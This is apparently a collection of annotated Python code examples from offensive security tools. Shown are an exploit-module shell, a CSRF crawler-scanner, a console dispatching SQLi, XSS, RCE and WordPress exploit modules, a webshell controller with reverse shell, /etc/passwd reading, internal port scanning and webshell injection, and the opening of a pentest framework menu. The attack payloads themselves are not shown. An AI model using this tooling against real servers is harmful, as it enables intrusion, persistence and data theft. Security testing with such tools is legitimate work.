                # module's own help.
                module_command = (raw_input("[%s]=> " % (color.red(CONTEXT)))
                                  or "help")
                if module_command == "help":
                    main_help()
                    continue
                if module_command.startswith("set "):
                    # Accepts exactly "set KEY VALUE" split on single spaces, so
                    # a VALUE containing a space is rejected.
                    if len(module_command.split(" ")) == 3:
                        key = module_command.split(" ")[1]
                        value = module_command.split(" ")[2]
                        exploit.set_config(key, value)
                    else:
                        Log.error("Check your input!")
                        Log.info("Example: \n\tset [KEY] [VALUE]")
                elif module_command == "options":
                    exploit.show_options()
                elif module_command == "info":
                    exploit.show_info()
                elif module_command == "exploit":
                    try:
                        exploit.exploit()
                    except Exception as e:
                        Log.error(str(e))
                elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back":
                    break
                else:
                    main_help()
            CONTEXT = reset_context()
        elif command == "q" or command == "quit" or command == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                # NOTE(review): any unrecognised or mistyped command is executed
                # as a local shell command; there is no confirmation step.
                Log.info("Executing command on localhost...")
                os.system(command)
예제 #14
def Engine():  # lets begin it!
    """Drive the whole crawl-and-scan run for one target.

    As written below: clear the screen and print the banners, read the start
    URL via ``inputin()``, build two cookie-jar-backed openers (one per
    simulated user), then crawl from that URL with ``Crawler.Handler`` and,
    for every form on every crawled page, run the checks that the module-level
    flags enable (``REFERER_ORIGIN_CHECKS``, ``COOKIE_BASED``,
    ``FORM_SUBMISSION``, ``POST_BASED``).  ``Analysis()`` runs at the end of
    the scan or on Ctrl-C.  Takes no arguments and returns nothing;
    ``quit()`` is called on a 403 from the crawler or on user interrupt.

    Everything it calls (``banner``, ``banabout``, ``inputin``, ``form10``,
    ``form20``, ``Debugger``, ``Parser``, ``Crawler``, ``Post``, ``Entropy``,
    ``Tamper``, ``PostBased``, ``Referer``, ``Origin``, ``Cookie``,
    ``Analysis``, ``verbout`` and the colour constants) is defined elsewhere
    in the project.
    """

    os.system('clear')  # Clear the terminal before the banners are printed
    banner()  # Print the banner
    banabout()  # The second banner
    web = inputin()  # Take the input (the URL the crawl starts from)
    form1 = form10()  # Get the form 1 ready
    form2 = form20()  # Get the form 2 ready

    # One cookie jar per simulated user, so the two sessions never share state.
    Cookie0 = http.cookiejar.CookieJar()  # First as User1
    Cookie1 = http.cookiejar.CookieJar()  # Then as User2
    resp1 = build_opener(HTTPCookieProcessor(Cookie0))  # User1's opener (Cookie0)
    resp2 = build_opener(HTTPCookieProcessor(Cookie1))  # User2's opener (Cookie1)

    actionDone = []  # form actions already handled; duplicates are skipped below

    # NOTE(review): csrf is never read again, and ref_detect / ori_detect are
    # set in the Referer/Origin branch below but never read either.
    csrf = ''  # no token initialise / invalid token
    ref_detect = 0x00  # Null Char
    ori_detect = 0x00
    init1 = web  # get the starting page
    form = Debugger.Form_Debugger()  # init to the form parser+token generator

    # NOTE(review): bs1 and bs2 are not used afterwards; the only effect of
    # these two lines is an IndexError if form1/form2 contain no <form action>.
    bs1 = BeautifulSoup(form1).findAll(
        'form', action=True)[0]  # make sure the stuff works properly
    bs2 = BeautifulSoup(form2).findAll('form', action=True)[0]  # same as above

    action = init1  # First init

    resp1.open(action)  # Initial request as User1 (resp1 carries Cookie0)
    resp2.open(action)  # Initial request as User2 (resp2 carries Cookie1)

    verbout(GR, "Initializing crawling and scanning...")
    crawler = Crawler.Handler(init1, resp1)  # Init to the Crawler handler (uses User1's opener)

    try:
        while crawler.noinit():  # Until 0 urls left
            url = next(crawler)  # Go for next!

            print(C + 'Crawling :> ' + color.CYAN +
                  url)  # Display what url its crawling

            try:
                soup = crawler.process(web)  # Start the parser
                if not soup:
                    continue  # Nothing parsed for this url; move on to the next one
                # Position of the current form on this page; reused further down
                # to pick the same form out of User2's copy of the page.
                i = 0  # Set count = 0
                if REFERER_ORIGIN_CHECKS:
                    # Referer Based Checks if True...
                    verbout(
                        O, 'Checking endpoint request validation via ' +
                        color.GREY + 'Referer' + color.END + ' Checks...')
                    if Referer(url):
                        ref_detect = 0x01
                    verbout(O, 'Confirming the vulnerability...')

                    # We have finished with Referer Based Checks, lets go for Origin Based Ones...
                    verbout(
                        O, 'Confirming endpoint request validation via ' +
                        color.GREY + 'Origin' + color.END + ' Checks...')
                    if Origin(url):
                        ori_detect = 0x01

                if COOKIE_BASED:
                    Cookie(url)

                # Now lets get the forms...
                verbout(
                    O, 'Retrieving all forms on ' + color.GREY + url +
                    color.END + '...')
                for m in Debugger.getAllForms(
                        soup):  # iterating over all forms extracted
                    action = Parser.buildAction(
                        url, m['action']
                    )  # resolve the form's action attribute against the page url
                    if not action in actionDone and action != '':  # if url returned is not a null value nor duplicate...
                        # If form submission is kept to True
                        if FORM_SUBMISSION:
                            try:
                                result = form.prepareFormInputs(
                                    m)  # prepare inputs
                                r1 = Post(
                                    url, action, result
                                ).text  # make request with token values generated as user1
                                result = form.prepareFormInputs(
                                    m)  # prepared again; this second result is what Entropy/Tamper/PostBased receive
                                r2 = Post(
                                    url, action, result
                                ).text  # again make request with token values generated as user2
                                # Go for token based entropy checks...
                                try:
                                    if m['name']:
                                        query, token = Entropy(
                                            result, url, m['action'],
                                            m['name'])
                                except KeyError:
                                    query, token = Entropy(
                                        result, url, m['action'])
                                # NOTE(review): when the form has a "name" attribute
                                # that is empty, neither branch above assigns
                                # query/token, so the next line raises NameError on
                                # the first such form (or silently reuses the
                                # previous form's values afterwards).
                                # Go for token parameter tamper checks.
                                if (query and token):
                                    Tamper(url, action, result, r2, query,
                                           token)
                                o2 = resp2.open(
                                    url).read()  # make request as user2
                                # Rebinding form2 here shadows the form20() result from
                                # the top of the function.
                                try:
                                    form2 = Debugger.getAllForms(
                                        BeautifulSoup(o2))[
                                            i]  # user2 gets his form
                                except IndexError:
                                    verbout(R, 'Form Error')
                                    # NOTE(review): this continue skips the
                                    # actionDone.append / i += 1 at the end of the
                                    # loop body, so i is off by one for the rest of
                                    # this page's forms.
                                    continue  # making sure program won't end here (dirty fix :( )
                                verbout(GR, 'Preparing form inputs...')
                                contents2 = form.prepareFormInputs(
                                    form2)  # prepare for form 2 as user2
                                r3 = Post(
                                    url, action, contents2
                                ).text  # make request as user3 with user2's form
                                if POST_BASED:
                                    try:
                                        if m['name']:
                                            PostBased(url, r1, r2, r3,
                                                      m['action'], result,
                                                      m['name'])
                                    except KeyError:
                                        PostBased(url, r1, r2, r3, m['action'],
                                                  result)

                            except HTTPError as msg:  # if runtime exception...
                                verbout(R, 'Exception : ' +
                                        msg.__str__())  # again exception :(

                    actionDone.append(action)  # add the stuff done
                    i += 1  # Increase user iteration

            except URLError:  # if again...
                # NOTE(review): if HTTPError/URLError are urllib.error's classes,
                # HTTPError is a subclass of URLError, so a 403 raised inside this
                # inner try (e.g. by crawler.process) is handled here and never
                # reaches the 403 handler of the outer try below.
                verbout(R, 'Exception at : ' + url)  # again exception -_-
                time.sleep(0.4)
                verbout(O, 'Moving on...')
                continue  # make sure it doesn't stop

        print('\n' + G + "Scan completed!" + '\n')
        Analysis()  # For Post Scan Analysis

    # This error usually happens when some sites are protected by some load balancer
    # example Cloudflare. These domains return a 403 forbidden response in various
    # contexts. For example when making reverse DNS queries.
    # Only exceptions raised outside the inner try (crawler.noinit(), next(crawler),
    # the "Crawling" print) can reach this handler.  A non-403 HTTPError is dropped
    # silently and Engine returns without "Scan completed!" or Analysis().
    except HTTPError as e:
        if str(e.code) == '403':
            verbout(R, 'HTTP Authentication Error!')
            verbout(R, 'Error Code : ' + O + str(e.code))
            quit()

    except KeyboardInterrupt:  # incase user wants to exit ;-; (while crawling)
        verbout(R, 'User Interrupt!')
        time.sleep(1.5)
        Analysis()  # For Post scan Analysis
        print(R + 'Aborted!')  # say goodbye
        quit()
예제 #15
def debby_anggraini():
    """Interactive ``Eazy_>`` prompt that dispatches each line to a tool module.

    Each input line is whitespace-split into ``wibu``; ``wibu[0]`` selects the
    module and ``toxic(wibu, '-u,-t,-s,-n,-f')`` turns the remaining flags
    into ``arg``, which is indexed as ``arg['-u']`` etc. (presumably a mapping
    from flag to value - verify in toxic()).  Unknown first tokens are
    reported through ``printf(..., 2)``; ``q``/``quit`` leaves the loop.
    Exceptions raised by a handler are caught per iteration: IndexError and
    KeyError show the module's usage, Ctrl-C prints a message and the loop
    continues, connection errors and any other exception are printed.

    Python 2 only (``raw_input``).  ``banner``, ``complete``, ``toxic``,
    ``help_menu``, ``usage``, ``printf``, ``show_modules``, the module
    functions and the lookup tables (``array``, ``webkit_dict``,
    ``encdec_array``, ``hash_array``) are defined elsewhere in the file.
    Returns nothing.
    """
    # banner and auto complete
    banner()
    complete(array)
    # loop forever :v
    while True:
        try:
            an = raw_input('Eazy_> ')
            wibu = an.split()
            # parse argument manual XD
            arg = toxic(wibu, '-u,-t,-s,-n,-f')
            # if an == '' or len(wibu) == 0:
            if not wibu:
                pass
            # help menu: "-h" / "--help" given anywhere after the module name.
            # Reads as (A and B) or (C and D) because `and` binds tighter than `or`.
            elif wibu[0] != '-h' and '-h' in wibu or wibu[
                    0] != '--help' and '--help' in wibu:
                help_menu(wibu[0])
            # advanced nmap commands
            elif wibu[0] == 'nmap':
                debby_lovlov(arg['-t'], arg['-u'])
            # webkit modules
            elif wibu[0] in webkit_dict:
                # dirty hack XD - if webkit_dict is a dict this is the same as
                # hackertarget(webkit_dict[wibu[0]], arg['-u'])
                for i in webkit_dict:
                    if wibu[0] == i:
                        hackertarget(webkit_dict[i], arg['-u'])
            elif wibu[0] == 'geoip':
                geoip(arg['-u'])
            elif wibu[0] == 'mxrecords':
                mx(arg['-u'])
            elif wibu[0] == 'domain_age':
                domage(arg['-u'])
            elif wibu[0] == 'whatcms':
                cms(arg['-u'])
            elif wibu[0] == 'subdomain':
                subdo(arg['-u'])
            elif wibu[0] == 'honeypot':
                honey(arg['-u'])
            elif wibu[0] == 'joom_sql_scan':
                j_sql(arg['-u'])
            elif wibu[0] == 'xss_scan':
                xss(arg['-u'])
            elif wibu[0] == 'rce_scan':
                rcevuln(arg['-u'])
            # exploit module
            elif wibu[0] == 'wpscan':
                wpscan(arg['-u'])
            elif wibu[0] == 'user_pro':
                check_vuln(arg['-u'])
            elif wibu[0] == 'wp_user':
                user_scan(arg['-u'], arg['-n'])
            elif wibu[0] == 'wp_sym_exp':
                exploit_wp(arg['-u'], arg['-f'])
            elif wibu[0] == 'simple_slide_show_exp':
                sss_ex(arg['-u'], arg['-f'])
            elif wibu[0] == 'product_page_advert_exp':
                ppa_ex(arg['-u'], arg['-f'])
            elif wibu[0] == 'home_page_advert_exp':
                hpa_ex(arg['-u'], arg['-f'])
            # scanner module
            elif wibu[0] == 'lfi_scan':
                lfiscan(arg['-u'])
            elif wibu[0] == 'hashbuster':
                hash_scan()
            elif wibu[0] == 'shell':
                shell(arg['-u'])
            elif wibu[0] == 'dirscan':  # dir
                # presumably a project function shadowing the builtin dir() -
                # check where dir is defined
                dir(arg['-u'])
            # A bare "dork" raises IndexError on wibu[1], which the except below
            # turns into usage('dork').
            elif wibu[0] == 'dork' and wibu[1] != None:
                msg = an.replace(wibu[0] + ' ',
                                 '').replace('-s ', '').replace('-s', '')
                if not msg:
                    usage('dork')
                elif '-s' in an:
                    dorking(msg, 'scan')
                else:
                    dorking(msg, )
            # brute force module
            elif wibu[0] == 'adfin':
                adfin(arg['-u'])
            elif wibu[0] == 'upload':
                upload(arg['-u'])
            # encryption modules
            elif wibu[0] in encdec_array:
                # bad coding :"
                if '--enc' in wibu or '-e' in wibu:
                    ende(wibu[0], 'enc')
                elif '--dec' in wibu or '-d' in wibu:
                    ende(wibu[0], 'dec')
                else:
                    usage(wibu[0])
            elif wibu[0] in hash_array:
                # two-argument call, so this is a project function shadowing the
                # builtin hash()
                hash(wibu[0], arg['-s'])
            # others
            elif wibu[0] == ':!':
                if len(wibu) == 1:
                    printf('sh: commands not found', 2)
                # NOTE(review): no else/continue above, so a bare ":!" still
                # reaches this call with an empty command string.
                os.system(an[2:])
            elif wibu[0] in ['q', 'quit']:
                printf('[!] bye bye..')
                break
            elif an == 'show modules' or an == 'help':
                show_modules()
            elif an == 'show all modules' or an == 'help more':
                show_modules('wibu bau bawang')
            else:
                printf('%s: not found.' % wibu[0], 2)
            # end
        # usage
        except (IndexError, KeyError):
            # NOTE(review): wibu[0] raises IndexError itself if wibu is empty
            # here, which only happens if toxic() raised before the
            # `if not wibu` check - verify toxic() tolerates an empty list.
            usage(wibu[0])
        # user interrupt: message only, the prompt loop keeps running
        except KeyboardInterrupt:
            printf('\n\rError: Interrupt..')
        # handle error
        except (requests.exceptions.ConnectionError):
            printf('Connection Error..', 2)
        except Exception as e:
            printf('%s' % str(e), 2)
예제 #16
def main():
    """Command-line entry point for the webshell management console.

    Expects exactly three positional arguments, ``URL METHOD PASSWORD``;
    otherwise ``show_help()`` is printed and the process exits with status 1.
    Exits with status 2 when ``WebShell(...).working`` is false.  Then loops
    on a ``=>`` prompt (empty input means ``h``), dispatching the lower-cased
    command to the ``webshell`` object; ``q``/``quit``/``exit`` ends the loop.
    Input that matches no command is executed either on the local host
    (``os.system``) or through ``webshell.auto_exec_print``, depending on
    ``LOCAL_COMMAND_FLAG`` (toggled by ``setl``/``setr``).

    Python 2 only (``raw_input``, ``string.lower``, ``string.letters``).
    ``banner``, ``show_help``, ``main_help``, ``WebShell``, ``Shell``,
    ``Mysql``, ``Log``, ``get_ip_address`` and ``random_string`` are defined
    elsewhere in the project.  Returns nothing.
    """
    banner()
    if len(sys.argv) != 4:
        show_help()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    # NOTE(review): taken from argv, so the password is visible in process
    # listings and shell history on the operator's machine.
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    # True: unrecognised input runs on the local host; False (after "setr"):
    # it is passed to webshell.auto_exec_print.  See the final else branch.
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)

    main_help()

    while True:
        Log.context("sniper")
        # Bare Enter defaults to "h".  Commands are matched on the lower-cased
        # text, but the fall-through branch executes the original line.
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            # Prompts for ip/port; defaults are get_ip_address() and 8888.
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            webshell.get_php_version()
        elif context == "kv" or context == "kernel_version":
            webshell.get_kernel_version()
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            # Both prompts default to webshell.webroot / " -size 500k"; the args
            # string is handed to download_advanced unchanged.
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" %
                          (path))
                continue
            if webshell.is_directory(path):
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " %
                                            ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                #filename = path.split("/")[-1]
                #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                # Log.info("Using root path : [%s] to save!" % (local_path))
                Log.info(
                    "The target file is a single file, starting download...")
                # NOTE(review): the same value is passed as both arguments; the
                # commented-out lines above show a local_path prompt that was
                # dropped, so presumably the second argument is the local
                # destination (and an absolute path lands there verbatim) - verify.
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            # Only the presence of "/" is checked, not that the CIDR is valid.
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # Rebinds the local name `password` (from argv above); harmless here
            # because webshell already holds the original.
            default = random_string(0x10, string.letters)
            filename = raw_input("Filename (.%s.php): " %
                                 (default)) or (".%s.php" % (default))
            password = raw_input("Password (%s): " % (default)) or ("%s" %
                                                                    (default))
            webshell.auto_inject_webshell(filename, password)
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            # NOTE(review): the database password is written to the log/console
            # in clear text.
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            # NOTE(review): `function` was already checked to be truthy above, so
            # this condition is always true and the else branch is unreachable.
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                # NOTE(review): any mistyped command is executed as a local shell
                # command (or sent through the webshell below) without confirmation.
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)
예제 #17
import os,time,sys
import core
from time import sleep
from ptf import *
from core.exploit import clean
from core.banner import banner,ptf
# Set color (ANSI escape sequences used by the prompt output)
R = '\033[31m' # Red
N = '\033[1;37m' # White
G = '\033[32m' # Green
O = '\033[0;33m' # Orange
B = '\033[1;34m' #Blue
E = '\033[0m' # End
# Requires root: sys.exit() with a string prints it to stderr and exits with
# status 1 whenever the effective uid is not 0.  The message wording is the
# requirement ("must run as root"), not a warning against running as root.
if not os.geteuid() == 0:# exit unless euid is 0
    sys.exit("""\033[1;91m\n[!] Pentest Tools Framework run as root!!. \n\033[1;m""")
# NOTE(review): main() is only defined *below* this statement (the def follows
# it), so the call raises NameError whenever the condition is true.  Because
# `or` short-circuits, clean()/banner()/ptf() run only when __name__ is not
# "__main__", i.e. at import time, and main() is then called at import time
# if any of them returns a truthy value.  Moving this block after def main()
# and dropping the side-effect calls from the condition would fix both.
if __name__ == "__main__" or clean() or banner() or ptf():
    main()
def main():
    while True:
            try:
                PTF = raw_input("Pentest>> ")
                if PTF == 'use modules/exploits':
                    core.menu.exploits()
                    main()
                elif PTF == 'use modules/scanners':
                    core.menu.scan()
                    main()
                elif PTF =='use modules/password':
                    core.menu.pas1()
                    main()
                elif PTF == 'use modules/post':